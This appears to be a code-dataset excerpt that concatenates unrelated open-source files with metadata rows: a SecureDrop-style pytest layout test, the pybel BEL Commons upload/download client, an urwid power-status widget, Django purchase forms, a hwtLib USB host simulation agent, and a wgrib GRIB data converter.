@pytest.mark.pagelayout
class TestSourceSessionLayout(
functional_test.FunctionalTest,
source_navigation_steps.SourceNavigationStepsMixin,
journalist_navigation_steps.JournalistNavigationStepsMixin):
def setup(self):
self.session_length_minutes = 0.03
super(TestSourceSessionLayout, self).setup(
session_expiration=self.session_length_minutes)
def test_source_session_timeout(self):
self._source_visits_source_homepage()
self._source_clicks_submit_documents_on_homepage()
self._source_continues_to_submit_page()
self._source_waits_for_session_to_timeout(self.session_length_minutes)
self._source_enters_text_in_message_field()
self._source_visits_source_homepage()
self._screenshot('source-session_timeout.png')
| agpl-3.0 | -5,079,552,309,221,852,000 | 37.685535 | 78 | 0.678101 | false |
pybel/pybel | src/pybel/io/bel_commons_client.py | 1 | 3998 | # -*- coding: utf-8 -*-
"""Transport functions for `BEL Commons <https://github.com/bel-commons/bel-commons>`_.
BEL Commons is a free, open-source platform for hosting BEL content. Because it was originally
developed and published in an academic capacity at Fraunhofer SCAI, a public instance can be
found at https://bel-commons-dev.scai.fraunhofer.de. However, this instance is only supported
out of posterity and will not be updated. If you would like to host your own instance of
BEL Commons, there are instructions on its GitHub page.
"""
import logging
from typing import Optional
import pystow
import requests
from .nodelink import from_nodelink, to_nodelink
from ..struct.graph import BELGraph
from ..version import get_version
__all__ = [
'to_bel_commons',
'from_bel_commons',
]
logger = logging.getLogger(__name__)
RECEIVE_ENDPOINT = '/api/receive/'
GET_ENDPOINT = '/api/network/{}/export/nodelink'
def _get_host() -> Optional[str]:
"""Find the host with :func:`pystow.get_config`.
Has two possibilities:
1. The PyBEL config entry ``PYBEL_REMOTE_HOST``, loaded in :mod:`pybel.constants`
2. The environment variable ``PYBEL_REMOTE_HOST``
"""
return pystow.get_config('pybel', 'remote_host')
def _get_user() -> Optional[str]:
return pystow.get_config('pybel', 'remote_user')
def _get_password() -> Optional[str]:
return pystow.get_config('pybel', 'remote_password')
def to_bel_commons(
graph: BELGraph,
host: Optional[str] = None,
user: Optional[str] = None,
password: Optional[str] = None,
public: bool = True,
) -> requests.Response:
"""Send a graph to the receiver service and returns the :mod:`requests` response object.
:param graph: A BEL graph
:param host: The location of the BEL Commons server. Alternatively, looks up in PyBEL config with
``PYBEL_REMOTE_HOST`` or the environment as ``PYBEL_REMOTE_HOST``.
:param user: Username for BEL Commons. Alternatively, looks up in PyBEL config with
``PYBEL_REMOTE_USER`` or the environment as ``PYBEL_REMOTE_USER``
:param password: Password for BEL Commons. Alternatively, looks up in PyBEL config with
``PYBEL_REMOTE_PASSWORD`` or the environment as ``PYBEL_REMOTE_PASSWORD``
:param public: Should the network be made public?
:return: The response object from :mod:`requests`
"""
if host is None:
host = _get_host()
logger.debug('using host: %s', host)
if user is None:
user = _get_user()
if user is None:
raise ValueError('no user found')
if password is None:
password = _get_password()
if password is None:
raise ValueError('no password found')
    url = host.rstrip('/') + RECEIVE_ENDPOINT
response = requests.post(
url,
json=to_nodelink(graph),
headers={
'content-type': 'application/json',
'User-Agent': 'PyBEL v{}'.format(get_version()),
'bel-commons-public': 'true' if public else 'false',
},
auth=(user, password),
)
logger.debug('received response: %s', response)
return response
def from_bel_commons(network_id: int, host: Optional[str] = None) -> BELGraph:
"""Retrieve a public network from BEL Commons.
In the future, this function may be extended to support authentication.
:param network_id: The BEL Commons network identifier
:param host: The location of the BEL Commons server. Alternatively, looks up in PyBEL config with
``PYBEL_REMOTE_HOST`` or the environment as ``PYBEL_REMOTE_HOST``.
:raises: ValueError if host configuration can not be found
"""
if host is None:
host = _get_host()
if host is None:
raise ValueError('host not specified in arguments, PyBEL configuration, or environment.')
url = host + GET_ENDPOINT.format(network_id)
res = requests.get(url)
graph_json = res.json()
graph = from_nodelink(graph_json)
return graph
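# Minimal usage sketch (illustration only; the host URL, credentials, and network id
# below are placeholders, not real endpoints):
#
#     graph = ...  # a pybel.BELGraph built elsewhere
#     resp = to_bel_commons(graph, host='https://bel-commons.example.org',
#                           user='[email protected]', password='secret')
#     graph2 = from_bel_commons(1, host='https://bel-commons.example.org')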
| mit | -2,507,534,870,051,758,600 | 31.504065 | 101 | 0.670585 | false |
SebastianSchildt/potatonet-power | gui/epod.py | 1 | 2803 | import urwid
from yesno import ConfirmButton
class ElectricityPodlet(object):
def __init__(self, name, nr):
self.name=name
self.nr=nr
self.PWRstate='off'
self.ETHstate='unknown'
self.buildGui()
def buildGui(self):
txt=urwid.Text(('nodehead', self.name), align='center')
#headline=urwid.Filler(txt,"middle")
headline=urwid.Padding(txt,align="center")
headline=urwid.AttrMap(headline,'nodehead')
self.eth=urwid.Text('Eth Link: '+str(self.ETHstate),align='left', wrap="clip")
if self.PWRstate=='on':
#self.btn=urwid.Button("Switch PWR Off")
self.btn=ConfirmButton("Switch PWR Off", self.PWRPress)
self.pwr=urwid.Text( ('nodeON' ,'Power: '+str(self.PWRstate)), align='left')
else:
#self.btn=urwid.Button("Switch PWR On")
self.btn=ConfirmButton("Switch PWR On", self.PWRPress)
self.pwr=urwid.Text( ('nodeOFF' ,'Power: '+str(self.PWRstate)), align='left')
#urwid.connect_signal(self.btn, 'click', self.PWRPress, self.name)
#self.btnHolder=urwid.AttrMap(self.btn, 'btn', focus_map='reversed')
self.btnHolder=self.btn
#p=urwid.Pile([ urwid.BoxAdapter(headline,1), ('pack',self.pwr), ('pack',eth), ('pack',self.btnHolder) ])
p=urwid.Pile([ headline, ('pack',self.pwr), ('pack',self.eth), ('pack',self.btnHolder) ])
self.ui=urwid.LineBox(p)
def updatePowerState(self,state):
if state == True or state==1 or int(state) == 1:
self.PWRstate="on"
self.btn.set_label("Switch PWR Off")
self.pwr.set_text( ('nodeON','Power: '+str(self.PWRstate)))
else:
self.PWRstate='off'
self.btn.set_label("Switch PWR On")
self.pwr.set_text( ('nodeOFF','Power: '+str(self.PWRstate)))
def updateEthernetState(self,state):
if int(state) == 0:
self.ETHstate="disabled"
#self.btn.set_label("Switch PWR Off")
self.eth.set_text( ('nodeOFF','Eth Link: '+str(self.ETHstate)))
elif int(state) == 1:
self.ETHstate="enabled, no link"
#self.btn.set_label("Switch PWR Off")
self.eth.set_text( ('nodeOFF','Eth Link: '+str(self.ETHstate)))
elif int(state) == 2:
self.ETHstate="UNKNOWN"
#self.btn.set_label("Switch PWR Off")
self.eth.set_text( ('nodeOFF','Eth Link: '+str(self.ETHstate)))
elif int(state) == 3:
self.ETHstate="enabled, link active"
#self.btn.set_label("Switch PWR Off")
self.eth.set_text( ('nodeON','Eth Link: '+str(self.ETHstate)))
else:
self.ETHstate='UNKNOWN'
#self.btn.set_label("Switch PWR On")
self.eth.set_text( ('nodeOFF','Eth Link: '+str(self.ETHstate)))
def PWRPress(self):
if self.PWRstate == 'off':
self.PWRstate='on'
self.btn.set_label("Switch PWR Off")
self.pwr.set_text( ('nodeON','Power: '+str(self.PWRstate)))
else:
self.PWRstate='off'
self.btn.set_label("Switch PWR On")
self.pwr.set_text( ('nodeOFF','Power: '+str(self.PWRstate)))
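# Minimal usage sketch (illustration only, not part of the original file): build a few
# podlet widgets and show them with a plain urwid main loop. The palette entries mirror
# the attribute names used above ('nodehead', 'nodeON', 'nodeOFF').
#
#     pods = [ElectricityPodlet('Node %d' % i, i) for i in range(4)]
#     cols = urwid.Columns([p.ui for p in pods])
#     fill = urwid.Filler(cols, valign='top')
#     palette = [('nodehead', 'white', 'dark blue'),
#                ('nodeON', 'dark green', ''),
#                ('nodeOFF', 'dark red', '')]
#     urwid.MainLoop(fill, palette).run()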
| mit | -2,659,397,285,443,749,000 | 30.144444 | 107 | 0.663932 | false |
zeta709/django-coffee-capsules | coffee_capsules/forms.py | 1 | 2874 | from django import forms
from django.contrib.admin import widgets
#from django.forms.extras import SelectDateWidget
from coffee_capsules.models import Purchase, PurchaseItem, Request
from coffee_capsules.widgets import SelectedReadonly
class PurchaseForm(forms.ModelForm):
class Meta:
model = Purchase
# References about AdminSplitDateTime():
# http://stackoverflow.com/questions/15643019/
def __init__(self, *args, **kwargs):
super(PurchaseForm, self).__init__(*args, **kwargs)
self.fields['begin_date'].widget = widgets.AdminSplitDateTime()
self.fields['end_date'].widget = widgets.AdminSplitDateTime()
class PurchaseItemForm(forms.ModelForm):
#default_price = forms.CharField()
class Meta:
model = PurchaseItem
widgets = {
'capsule': SelectedReadonly(),
}
def __init__(self, *args, **kwargs):
super(PurchaseItemForm, self).__init__(*args, **kwargs)
self.fields['capsule'].widget.attrs['readonly'] = 'readonly'
#self.fields['default_price'].widget = forms.HiddenInput()
#self.fields['default_price'].widget.attrs['readonly'] = 'readonly'
class MyRequestForm(forms.ModelForm):
class Meta:
model = Request
#fields = ('purchaseitem','user', 'quantity_queued',)
#readonly_fields = ('purchaseitem','user',)
exclude = ('user',)
widgets = {
'purchaseitem': SelectedReadonly(),
#'user': SelectedReadonly(),
#'user': forms.HiddenInput(),
#'user': forms.Select(),
#'user': forms.TextInput(),
}
def __init__(self, *args, **kwargs):
super(MyRequestForm, self).__init__(*args, **kwargs)
self.fields['purchaseitem'].widget.attrs['readonly'] = 'readonly'
self.fields['purchaseitem'].label = 'Item'
self.fields['quantity_queued'].label = 'Quantity'
def clean_quantity_queued(self):
qty = self.cleaned_data['quantity_queued']
my_u_unit = self.cleaned_data['purchaseitem'].purchase.u_unit
if qty < 0:
raise forms.ValidationError("Values cannot be negative.")
if qty % my_u_unit != 0:
            raise forms.ValidationError('Each value should be a multiple of '
+ str(my_u_unit))
return qty
def clean(self):
cleaned_data = super(MyRequestForm, self).clean()
purchaseitem = cleaned_data.get("purchaseitem")
purchase = purchaseitem.purchase
if purchase.is_not_open():
raise forms.ValidationError("The purchase is not yet open.")
if purchase.is_ended():
raise forms.ValidationError("The purchase is aleady ended.")
if purchase.is_closed:
raise forms.ValidationError("The purchase is closed.")
return cleaned_data
| bsd-3-clause | -2,064,641,096,433,153,300 | 36.324675 | 76 | 0.618302 | false |
Nic30/hwtLib | hwtLib/peripheral/usb/sim/usb_agent_host.py | 1 | 16690 | from typing import Deque, Union, Optional, List
from hwt.code import Concat
from hwt.hdl.types.bitsVal import BitsVal
from hwt.hdl.types.struct import HStruct
from hwt.hdl.types.structValBase import StructValBase
from hwt.hdl.value import HValue
from hwt.synthesizer.rtlLevel.constants import NOT_SPECIFIED
from hwtLib.peripheral.usb.constants import USB_PID
from hwtLib.peripheral.usb.descriptors.bundle import UsbDescriptorBundle, \
UsbNoSuchDescriptor
from hwtLib.peripheral.usb.descriptors.cdc import usb_descriptor_functional_header, \
USB_CDC_DESCRIPTOR_SUBTYPE, usb_descriptor_functional_header_t, \
usb_descriptor_functional_call_management_t, \
usb_descriptor_functional_abstract_control_management_t, \
usb_define_descriptor_functional_union_t
from hwtLib.peripheral.usb.descriptors.std import usb_descriptor_interface_t, \
USB_DEVICE_CLASS, usb_descriptor_header_t, USB_DESCRIPTOR_TYPE, \
usb_descriptor_configuration_t, usb_descriptor_endpoint_t, \
make_usb_device_request_get_descr, usb_define_descriptor_string, \
usb_descriptor_device_t, usb_descriptor_device_qualifier_t, \
usb_define_descriptor_string0, USB_ENDPOINT_DIR
from hwtLib.peripheral.usb.device_request import make_usb_device_request, \
USB_REQUEST_TYPE_RECIPIENT, USB_REQUEST_TYPE_TYPE, \
USB_REQUEST_TYPE_DIRECTION, USB_REQUEST
from hwtLib.peripheral.usb.sim.agent_base import UsbAgent, UsbPacketToken, \
UsbPacketData, UsbPacketHandshake
from hwtLib.types.ctypes import uint8_t
class UsbHostAgent(UsbAgent):
"""
This agent uses rx and tx queue to comunicate with a USB device.
It performs bus enumerations, sets address to a device and downloads
the descriptors. Note that the agent is written in a way which allows for easy
extension to a driver which can parse the specific descriptors and comunicate with devices further.
"""
def __init__(self,
rx: Deque[Union[UsbPacketToken, UsbPacketHandshake, UsbPacketData]],
tx: Deque[Union[UsbPacketToken, UsbPacketHandshake, UsbPacketData]]):
super(UsbHostAgent, self).__init__(rx, tx)
        # the addresses are not assigned yet; this dictionary will be filled during device enumeration
self.descr = {}
self._descriptors_downloaded = False
def parse_interface_functional_descriptor(self, interface_descr: StructValBase, data:BitsVal):
bInterfaceClass = int(interface_descr.body.bInterfaceClass)
if bInterfaceClass == USB_DEVICE_CLASS.CDC_CONTROL:
h_t = usb_descriptor_functional_header
header = data[h_t.bit_length():]._reinterpret_cast(h_t)
sub_t = int(header.bDescriptorSubtype)
if sub_t == USB_CDC_DESCRIPTOR_SUBTYPE.HEADER:
descr_t = usb_descriptor_functional_header_t
elif sub_t == USB_CDC_DESCRIPTOR_SUBTYPE.CALL_MANAGEMENT_FUNCTIONAL:
descr_t = usb_descriptor_functional_call_management_t
elif sub_t == USB_CDC_DESCRIPTOR_SUBTYPE.ABSTRACT_CONTROL_MANAGEMENT:
descr_t = usb_descriptor_functional_abstract_control_management_t
elif sub_t == USB_CDC_DESCRIPTOR_SUBTYPE.UNION:
slave_cnt = (data._dtype.bit_length() - h_t.bit_length() - 8) // 8
descr_t = usb_define_descriptor_functional_union_t(slave_cnt)
assert data._dtype.bit_length() == descr_t.bit_length()
return data._reinterpret_cast(descr_t)
else:
raise NotImplementedError()
def parse_configuration_descriptor_bundle(self, data_bytes: List[int]):
data = [d if isinstance(d, HValue) else uint8_t.from_py(d) for d in data_bytes]
data = Concat(*reversed(data))
offset = 0
end = data._dtype.bit_length()
header_width = usb_descriptor_header_t.bit_length()
descriptors = []
interface_descr = None
while offset < end:
header = data[header_width + offset: offset]
header = header._reinterpret_cast(usb_descriptor_header_t)
descr_typeId = int(header.bDescriptorType)
descr_width = int(header.bLength) * 8
try:
d = data[descr_width + offset: offset]
except IndexError:
raise IndexError("The input data is incomplete, the header suggest additional data",
offset, descr_width, end)
if descr_typeId == USB_DESCRIPTOR_TYPE.CONFIGURATION:
t = usb_descriptor_configuration_t
assert descr_width == t.bit_length()
d = d._reinterpret_cast(t)
interface_descr = None
elif descr_typeId == USB_DESCRIPTOR_TYPE.INTERFACE:
# :note: interface descriptors are class dependent,
# the class can be resolved from first interface descriptor
# next interface descriptors may be functional descriptors
t = usb_descriptor_interface_t
assert d._dtype.bit_length() == t.bit_length(), (d._dtype.bit_length(), t.bit_length())
d = d._reinterpret_cast(t)
interface_descr = d
elif descr_typeId == USB_DESCRIPTOR_TYPE.ENDPOINT:
t = usb_descriptor_endpoint_t
assert descr_width == t.bit_length()
d = d._reinterpret_cast(t)
elif descr_typeId == USB_DESCRIPTOR_TYPE.FUNCTIONAL:
d = self.parse_interface_functional_descriptor(interface_descr, d)
else:
raise NotImplementedError(descr_typeId)
descriptors.append(d)
offset += descr_width
return descriptors
def get_max_packet_size(self, addr:int, endp: int, direction: USB_ENDPOINT_DIR):
ddb: UsbDescriptorBundle = self.descr.get(addr, None)
if ddb is None:
max_packet_size = 64
else:
if endp == 0:
d = ddb.get_descriptor(usb_descriptor_device_t, 0)[1]
max_packet_size = int(d.body.bMaxPacketSize)
else:
max_packet_size = None
for des in ddb:
if des._dtype == usb_descriptor_endpoint_t and \
int(des.body.bEndpointAddress) == endp and \
int(des.body.bEndpointAddressDir) == direction:
max_packet_size = int(des.body.wMaxPacketSize)
break
if max_packet_size is None:
raise ValueError("Can not find configuration for endpoint in descriptors", endp, ddb)
return max_packet_size
def receive_bulk(self, addr: int, endp: int, pid_init: USB_PID, size=NOT_SPECIFIED) -> List[int]:
max_packet_size = self.get_max_packet_size(addr, endp, USB_ENDPOINT_DIR.IN)
pid = pid_init
        # start receiving the data
yield from self.send(UsbPacketToken(USB_PID.TOKEN_IN, addr, endp))
# can receive data or STALL if the descriptor is not present
d_raw = yield from self.receive(NOT_SPECIFIED)
if isinstance(d_raw, UsbPacketData):
assert d_raw.pid == pid, (d_raw.pid, pid)
# descriptor data
yield from self.send_ack()
if size is not NOT_SPECIFIED:
return d_raw.data
# could be actually larger in the case when EP0 is not configured yet
if len(d_raw.data) >= max_packet_size:
                # could be split into multiple packets
                # if the first chunk was exactly max_packet_size and that is the size we are asking for
while True:
if pid == USB_PID.DATA_0:
pid = USB_PID.DATA_1
elif pid == USB_PID.DATA_1:
pid = USB_PID.DATA_0
else:
raise NotImplementedError(pid)
yield from self.send(UsbPacketToken(USB_PID.TOKEN_IN, addr, endp))
descr_part = yield from self.receive(UsbPacketData)
                    assert descr_part.pid == pid, (descr_part.pid, pid)
d_raw.data.extend(descr_part.data)
yield from self.send_ack()
if len(descr_part.data) < max_packet_size:
break
return d_raw.data
elif isinstance(d_raw, UsbPacketHandshake):
# packet which means some error
if d_raw.pid == USB_PID.HS_STALL:
raise UsbNoSuchDescriptor()
elif d_raw.pid == USB_PID.HS_NACK:
return None
else:
raise NotImplementedError()
else:
raise NotImplementedError()
def transmit_bulk(self, addr: int, endp: int, pid_init: USB_PID, data_bytes: List[int]):
max_packet_size = self.get_max_packet_size(addr, endp, USB_ENDPOINT_DIR.OUT)
pid = pid_init
# start sending the data
begin = 0
end = len(data_bytes)
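        # send the payload in max_packet_size chunks, toggling DATA0/DATA1 between packets;
        # a final short (possibly empty) packet terminates the transfer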
while True:
yield from self.send(UsbPacketToken(USB_PID.TOKEN_OUT, addr, endp))
_end = min(begin + max_packet_size, end)
p = UsbPacketData(pid, data_bytes[begin:_end])
yield from self.send(p)
yield from self.wait_on_ack()
begin = _end
if pid == USB_PID.DATA_0:
pid = USB_PID.DATA_1
elif pid == USB_PID.DATA_1:
pid = USB_PID.DATA_0
else:
raise ValueError(pid)
if len(p.data) < max_packet_size:
break
def control_read(self, addr, bmRequestType_type:USB_REQUEST_TYPE_TYPE, bRequest:int,
wValue:int, wIndex:int, wLength:int,
bmRequestType_recipient:USB_REQUEST_TYPE_RECIPIENT=USB_REQUEST_TYPE_RECIPIENT.DEVICE,
bmRequestType_data_transfer_direction:USB_REQUEST_TYPE_DIRECTION=USB_REQUEST_TYPE_DIRECTION.DEV_TO_HOST,
):
dev_req = make_usb_device_request(
bmRequestType_recipient=bmRequestType_recipient,
bmRequestType_type=bmRequestType_type,
bmRequestType_data_transfer_direction=bmRequestType_data_transfer_direction,
bRequest=bRequest,
wValue=wValue,
wIndex=wIndex,
wLength=wLength)
# read the device descriptor
# SETUP STAGE, send request for descriptor downloading
yield from self.send(UsbPacketToken(USB_PID.TOKEN_SETUP, addr, 0))
yield from self.send(UsbPacketData(USB_PID.DATA_0, dev_req))
yield from self.wait_on_ack()
# DATA stage
data = yield from self.receive_bulk(addr, 0, USB_PID.DATA_1)
# STATUS stage
yield from self.transmit_bulk(addr, 0, USB_PID.DATA_1, [])
return data
def control_write(self, addr:int, ep:int, bmRequestType_type:USB_REQUEST_TYPE_TYPE,
bRequest:int, wValue:int, wIndex:int, buff:List[int],
bmRequestType_recipient:USB_REQUEST_TYPE_RECIPIENT=USB_REQUEST_TYPE_RECIPIENT.DEVICE,
bmRequestType_data_transfer_direction:USB_REQUEST_TYPE_DIRECTION=USB_REQUEST_TYPE_DIRECTION.HOST_TO_DEV,
):
p = UsbPacketToken(USB_PID.TOKEN_SETUP, addr, ep)
yield from self.send(p)
dev_req = make_usb_device_request(
bmRequestType_recipient=bmRequestType_recipient,
bmRequestType_type=bmRequestType_type,
bmRequestType_data_transfer_direction=bmRequestType_data_transfer_direction,
bRequest=bRequest,
wValue=wValue,
wIndex=wIndex,
wLength=len(buff))
yield from self.send(UsbPacketData(USB_PID.DATA_0, dev_req))
yield from self.wait_on_ack()
if buff:
yield from self.transmit_bulk(addr, 0, USB_PID.DATA_1, buff)
else:
            # no data present, skipping the write
pass
# STATUS stage
data = yield from self.receive_bulk(addr, 0, USB_PID.DATA_1)
assert not data, data
def download_descriptor(self,
addr: int,
descriptor_t: Union[HStruct, str],
index: int,
wIndex:int=0,
wLength: Optional[int]=NOT_SPECIFIED):
dev_req_get_descr = make_usb_device_request_get_descr(
descriptor_t, index, wIndex=wIndex, wLength=wLength)
# read the device descriptor
# SETUP STAGE, send request for descriptor downloading
yield from self.send(UsbPacketToken(USB_PID.TOKEN_SETUP, addr, 0))
yield from self.send(UsbPacketData(USB_PID.DATA_0, dev_req_get_descr))
yield from self.wait_on_ack()
# DATA stage
descr = yield from self.receive_bulk(addr, 0, USB_PID.DATA_1)
# assert len(descr) == int(dev_req_get_descr.wLength), (descriptor_t, wIndex, len(descr), int(dev_req_get_descr.wLength))
if wLength is NOT_SPECIFIED:
if descriptor_t is str:
char_cnt = (len(descr) - usb_descriptor_header_t.bit_length() // 8) // 2
if index == 0:
descriptor_t = usb_define_descriptor_string0(char_cnt)
else:
descriptor_t = usb_define_descriptor_string(char_cnt)
descr = UsbPacketData(USB_PID.DATA_1, descr)
descr = descr.unpack(descriptor_t)
else:
assert len(descr) == int(dev_req_get_descr.wLength), (len(descr), int(dev_req_get_descr.wLength))
assert descriptor_t is usb_descriptor_configuration_t, descriptor_t
descr = self.parse_configuration_descriptor_bundle(descr)
# STATUS stage
yield from self.send(UsbPacketToken(USB_PID.TOKEN_OUT, addr, 0))
yield from self.send(UsbPacketData(USB_PID.DATA_1, []))
yield from self.wait_on_ack()
return descr
def proc(self):
new_addr = len(self.descr) + 1
# init device address
yield from self.control_write(0, 0,
bmRequestType_type=USB_REQUEST_TYPE_TYPE.STANDARD,
bRequest=USB_REQUEST.SET_ADDRESS,
wValue=new_addr,
wIndex=0,
buff=[])
# :note: device address now set, starting download of descriptors
dev_descr = yield from self.download_descriptor(new_addr, usb_descriptor_device_t, 0)
ddb = self.descr[new_addr] = UsbDescriptorBundle()
ddb.append(dev_descr)
bNumConfigurations = int(dev_descr.body.bNumConfigurations)
assert bNumConfigurations > 0, "Device must have some configuration descriptors"
for i in range(bNumConfigurations):
            # first we have to resolve wTotalLength (the total length of the configuration bundle)
conf_descr = yield from self.download_descriptor(new_addr, usb_descriptor_configuration_t, i)
size = int(conf_descr.body.wTotalLength)
# now we download all descriptors in configuration bundle
conf_descr_bundle = yield from self.download_descriptor(
new_addr, usb_descriptor_configuration_t, i, wLength=size)
real_size = sum(c._dtype.bit_length() for c in conf_descr_bundle) // 8
assert real_size == size, (real_size, size, conf_descr_bundle)
ddb.extend(conf_descr_bundle)
while True:
try:
yield from self.download_descriptor(
new_addr, usb_descriptor_device_qualifier_t, 0
)
except UsbNoSuchDescriptor:
break
raise NotImplementedError("usb_descriptor_device_qualifier")
# now read all string descriptors
str_descr0 = None
for i in range(0, 255):
try:
str_descr = yield from self.download_descriptor(
new_addr, str, i,
wIndex=0 if i == 0 else int(str_descr0.body[0])
)
except UsbNoSuchDescriptor:
if i == 0:
raise UsbNoSuchDescriptor("Need at least string descriptor 0 with language code")
else:
# other are not required
break
if i == 0:
str_descr0 = str_descr
ddb.append(str_descr)
self._descriptors_downloaded = True
| mit | 3,811,309,973,746,290,000 | 46.146893 | 129 | 0.594548 | false |
stephenlienharrell/WPEAR | wpear/DataConverter.py | 1 | 9026 | #! /usr/bin/env python
import os
import shlex
import shutil
import subprocess
import sys
WGRIB_PATH='./wgrib'
EGREP_PATH='egrep'
GREP_PATH='grep'
NCEP_GRID_TYPE=3
# http://www.nco.ncep.noaa.gov/pmb/docs/on388/tableb.html
class DataConverter:
FNULL=open(os.devnull, 'w')
def __init__(self, wgrib_path=WGRIB_PATH, egrep_path=EGREP_PATH, grep_path=GREP_PATH, ncep_grid_type=NCEP_GRID_TYPE):
self.wgrib_path = wgrib_path
self.egrep_path = egrep_path
self.grep_path = grep_path
self.grid_type = ncep_grid_type
    def interpolateGrid(self, inputfilepath, outputfilepath):
        # This isn't working yet. A possible fix is described at http://www.ftp.cpc.ncep.noaa.gov/wd51we/wgrib2/tricks.wgrib2 #21
cmd1 = '{} {} -new_grid ncep grid {} {}'.format(self.wgrib_path, inputfilepath, self.grid_type, outputfilepath)
ps = subprocess.check_output(shlex.split(cmd1), stderr=subprocess.STDOUT)
def extractMessages(self, inputfilepath, varlist, outputfilepath):
cmd1 = '{} {} -s'.format(self.wgrib_path, inputfilepath)
try:
ps = subprocess.check_output(shlex.split(cmd1), stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
# check if the e.output starts with :*** FATAL ERROR: Statistical processing bad n=0 ***
# http://www.ftp.cpc.ncep.noaa.gov/wd51we/wgrib2/tricks.wgrib2
            # this may happen several times; in the future, handle it once for each error message
text = os.linesep.join([s for s in e.output.splitlines() if s])
print text
if text.startswith('*** FATAL ERROR: Statistical processing bad n=0 ***') :
lastline = text.splitlines()[-1]
errmsgno = int(str(lastline.split(':')[0]).strip())
# creating new file without error msg
newinputfilepath = os.path.splitext(inputfilepath)[0] + 'fixstat' + os.path.splitext(inputfilepath)[1]
newfilecmd1 = '{} {} -pdt'.format(self.wgrib_path, inputfilepath)
newfilecmd2 = '{} -v ^{}:'.format(self.egrep_path, errmsgno)
newfilecmd3 = '{} -i {} -grib {}'.format(self.wgrib_path, inputfilepath, newinputfilepath)
p1 = subprocess.Popen(shlex.split(newfilecmd1), stdout=subprocess.PIPE)
p2 = subprocess.Popen(shlex.split(newfilecmd2), stdin=p1.stdout, stdout=subprocess.PIPE)
p3 = subprocess.Popen(shlex.split(newfilecmd3), stdin=p2.stdout, stdout=self.FNULL)
p3.wait()
inputfilepath = newinputfilepath
cmd1 = '{} {} -s'.format(self.wgrib_path, newinputfilepath)
else:
                print 'extractMessages failed for file = {}\n'.format(inputfilepath)
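        # pipeline: list the GRIB inventory (wgrib -s), grep it for the requested variables,
        # then feed the matching inventory lines back to wgrib -i to copy only those messages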
pipe1 = subprocess.Popen(shlex.split(cmd1), stdout=subprocess.PIPE)
greplist = [self.grep_path]
for var in varlist:
greplist.append('-e')
greplist.append(var)
pipe2 = subprocess.Popen(greplist, stdin=pipe1.stdout, stdout=subprocess.PIPE)
cmd3 = '{} -i {} -grib {}'.format(self.wgrib_path, inputfilepath, outputfilepath)
pipe3 = subprocess.Popen(shlex.split(cmd3), stdin=pipe2.stdout, stdout=self.FNULL)
pipe3.wait()
def subsetRegion(self, inputfilepath, minlat, maxlat, minlon, maxlon, outputfilepath):
cmd = '{} {} -small_grib {}:{} {}:{} {} -set_grib_type same'.format(self.wgrib_path, inputfilepath, minlon, maxlon, minlat, maxlat, outputfilepath)
try:
subprocess.check_call(shlex.split(cmd), stdout=self.FNULL)
except subprocess.CalledProcessError as e:
print e.cmd
print e.returncode
print e.output
def extractMessagesAndSubsetRegion(self, inputfilepath, varlist, tempfiledir, minlat, maxlat, minlon, maxlon, outputfilepath):
try:
os.makedirs(tempfiledir)
except OSError:
pass
if tempfiledir.endswith('/'):
tempfilepath = tempfiledir + inputfilepath.split('/')[-1]
tempfilepath2 = tempfiledir + inputfilepath.split('/')[-1] + 'temp2'
else:
tempfilepath = tempfiledir + '/' + inputfilepath.split('/')[-1]
tempfilepath2 = tempfiledir + '/' + inputfilepath.split('/')[-1] + 'temp2'
self.subsetRegion(inputfilepath, minlat, maxlat, minlon, maxlon, tempfilepath)
self.extractMessages(tempfilepath, varlist, tempfilepath2)
if inputfilepath.split('/')[-1].startswith('hrrr'):
self.interpolateGridHRRR(tempfilepath2, outputfilepath)
elif inputfilepath.split('/')[-1].startswith('rtma'):
self.interpolateGridRTMA(tempfilepath2, outputfilepath)
else:
raise AttributeError('no known file format found')
os.remove(tempfilepath)
os.remove(tempfilepath2)
def interpolateGridHRRR(self, inputfilepath, outputfilepath, nx=500, ny=500, dx=1000, dy=1000):
# nx = number of grid points in x-direction
# ny = number of grid points in y-direction
# dx = grid cell size in meters in x-direction
# dy = grid cell size in meters in y direction
cmd = '{} -set_grib_type same {} -new_grid_winds grid -new_grid lambert:262.5:38.5:38.5 271.821305:{}:{} 38.261837:{}:{} {}'.format(self.wgrib_path, inputfilepath, nx, dx, ny, dy, outputfilepath)
try:
subprocess.check_call(shlex.split(cmd), stdout=self.FNULL)
except subprocess.CalledProcessError as e:
print e.cmd
print e.returncode
print e.output
def interpolateGridRTMA(self, inputfilepath, outputfilepath, nx=500, ny=500, dx=1000, dy=1000):
# nx = number of grid points in x-direction
# ny = number of grid points in y-direction
# dx = grid cell size in meters in x-direction
# dy = grid cell size in meters in y direction
cmd = '{} -set_grib_type same {} -new_grid_winds grid -new_grid lambert:265:25:25 272.014856:{}:{} 38.231829:{}:{} {}'.format(self.wgrib_path, inputfilepath, nx, dx, ny, dy, outputfilepath)
try:
subprocess.check_call(shlex.split(cmd), stdout=self.FNULL)
except subprocess.CalledProcessError as e:
print e.cmd
print e.returncode
print e.output
###############################################################################################
########################################### Test ##############################################
###############################################################################################
# dc = DataConverter()
###############################################################################################
######################################### extractMessages #####################################
###############################################################################################
# dc.extractMessages('sourceFileDownloads/rtma2p5.t00z.2dvaranl_ndfd.grb2', [':DPT:2 m above ground', ':TMP:2 m above ground'], 'sourceFileDownloads/em_rtma2p5.t00z.2dvaranl_ndfd.grb2')
# dc.extractMessages('sourceFileDownloads/hrrr.t00z.wrfsfcf18.grib2', [':TMP:500 mb', ':WIND:10 m above ground'], 'sourceFileDownloads/em_hrrr.t00z.wrfsfcf18.grib2')
# dc.extractMessages('sourceFileDownloads/hrrr.t00z.wrfsfcf00.grib2', [':TMP:500 mb', ':WIND:10 m above ground'], 'sourceFileDownloads/em_hrrr.t00z.wrfsfcf00.grib2')
###############################################################################################
######################################### subsetRegion ########################################
###############################################################################################
# dc.subsetRegion('sourceFileDownloads/em_rtma2p5.t00z.2dvaranl_ndfd.grb2', 38.22, 41.22, -87.79, -84.79, 'sourceFileDownloads/sem_rtma2p5.t00z.2dvaranl_ndfd.grb2')
# dc.subsetRegion('sourceFileDownloads/em_hrrr.t00z.wrfsfcf18.grib2', 38.22, 41.22, -87.79, -84.79, 'sourceFileDownloads/sem_hrrr.t00z.wrfsfcf18.grib2')
